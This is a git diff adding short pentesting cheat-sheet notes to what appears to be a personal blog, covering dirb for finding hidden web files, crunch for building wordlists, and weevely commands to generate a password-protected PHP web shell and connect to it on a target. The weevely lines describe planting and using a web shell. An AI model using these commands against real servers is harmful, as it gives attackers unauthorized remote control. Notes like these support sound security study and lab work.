--- a/_posts/notes/tools/2022-04-24-web.md
+++ b/_posts/notes/tools/2022-04-24-web.md
@@ -5,5 +5,24 @@ date: 2022-04-24
 permalink: /notes/tools/web/
 ---
 
-# [](#header-4)Fuzzer
+# [](#header-4)fuzzer
+
+# [](#header-4)dirb
+To get hidden files.
+{% highlight plain %}
+> dirb [domain]
+{% endhighlight %}
+
+# [](#header-4)crunch
+To generate dictionaries:
+{% highlight plain %}
+> crunch <min> <max> [options]
+{% endhighlight %}
+
+# [](#header-4)weevely
+To generate a shell:
+{% highlight plain %}
+> weevely generate [password] /home/kali/shell.php
+> weevely http://ip/shell.php [password]
+{% endhighlight %}
 
